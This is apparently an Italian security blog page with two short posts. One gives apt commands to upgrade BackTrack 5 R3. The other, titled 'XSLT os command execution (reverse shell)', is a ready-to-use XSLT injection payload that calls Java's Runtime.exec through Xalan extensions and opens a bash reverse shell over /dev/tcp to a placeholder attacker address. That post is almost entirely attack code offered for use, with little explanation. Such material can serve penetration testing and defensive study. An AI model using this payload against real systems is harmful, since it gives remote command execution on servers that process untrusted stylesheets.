16/01/13

Backtrack 5 R3 Update/Upgrade

# apt-add-repository ppa:svn/ppa
# apt-get update
# apt-get dist-upgrade

Posted by at Nessun commento:
Labels: ,

11/01/13

XSLT os command execution (reverse shell)


XSLT code injection

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:j="http://xml.apache.org/xalan/java" xmlns:runtime="xalan://java.lang.Runtime" version="1.0">
<xsl:output method="text"/>
<xsl:strip-space elements="*"/>
<xsl:variable name="rt" select="runtime:getRuntime()"/>
<xsl:variable name="unix_shell" select="'/bin/bash'"/>
<xsl:variable name="unix_option" select="'-c'"/>
<xsl:variable name="command" select="'0&lt;&amp;196;exec 196&lt;&gt;/dev/tcp/<attackerIP>/2222; sh &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196'"/>
<xsl:variable name="separator" select="' ---Separator-- '"/>
<xsl:template match="/">
<xsl:variable name="tmp">
<xsl:value-of select="concat($unix_shell, $separator, $unix_option, $separator, $command)"/>
</xsl:variable>
<xsl:variable name="cmd" select="j:java.lang.String.new($tmp)"/>
<xsl:variable name="array" select="j:split($cmd, $separator)"/>
<xsl:variable name="proc" select="runtime:exec($rt, $array)"/>
</xsl:template>
</xsl:stylesheet>

Riferimenti:
http://xhe.myxwiki.org/xwiki/bin/view/XSLT/Engine_XalanJ
Posted by at Nessun commento:
Labels: , ,
Iscriviti a: Post (Atom)